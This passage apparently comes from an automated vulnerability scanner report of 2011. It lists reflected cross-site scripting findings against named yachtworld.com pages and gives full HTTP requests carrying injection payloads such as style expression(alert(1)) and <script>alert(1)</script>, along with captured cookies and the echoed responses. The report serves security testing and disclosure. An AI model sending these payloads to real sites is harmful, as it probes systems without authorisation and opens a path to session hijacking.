savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:29 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/builder/model/United+Statesed03b"><a>e5669ac6abc/Virginia/A-1">
...[SNIP]...

3.314. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Virginia/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Virginia/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef72"style%3d"x%3aexpression(alert(1))"1012e8331a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bef72"style="x:expression(alert(1))"1012e8331a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Virginia/1?bef72"style%3d"x%3aexpression(alert(1))"1012e8331a0=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:04 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:11 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&bef72"style="x:expression(alert(1))"1012e8331a0&slim=yw&seo=true&N=4711&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.315. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Washington/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Washington/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6744"style%3d"x%3aexpression(alert(1))"1dcf31d97c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a6744"style="x:expression(alert(1))"1dcf31d97c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Washington/1?a6744"style%3d"x%3aexpression(alert(1))"1dcf31d97c2=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:00 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&a6744"style="x:expression(alert(1))"1dcf31d97c2&ic=true&slim=yw&seo=true&N=4737&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.316. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Wisconsin/1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ccf2"><a>8388dceab17 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/category/type/builder/model/United+States4ccf2"><a>8388dceab17/Wisconsin/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:41 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a href="/boats/category/type/builder/model/United+States4ccf2"><a>8388dceab17/Wisconsin/A-1">
...[SNIP]...

3.317. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Wisconsin/1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9632"style%3d"x%3aexpression(alert(1))"41870955065 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9632"style="x:expression(alert(1))"41870955065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /boats/category/type/builder/model/United+States/Wisconsin/1?b9632"style%3d"x%3aexpression(alert(1))"41870955065=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:19 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:12:25 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>B
...[SNIP]...
<a rel="nofollow" href="/core/listing/cache/searchResults.jsp?ps=30&ic=true&slim=yw&b9632"style="x:expression(alert(1))"41870955065&seo=true&N=4738&sm=3&obp=true&cit=true" class="removalLink">
...[SNIP]...

3.318. http://www.yachtworld.com/clarkslanding/clarkslanding_1.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/clarkslanding/clarkslanding_1.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 1b16a<script>alert(1)</script>8b6edeb2d0e was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /clarkslanding/clarkslanding_1.cgi?company=clarkslanding&limit=50&type=&new=&units=Feet&hosturl=clarkslanding1b16a<script>alert(1)</script>8b6edeb2d0e&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
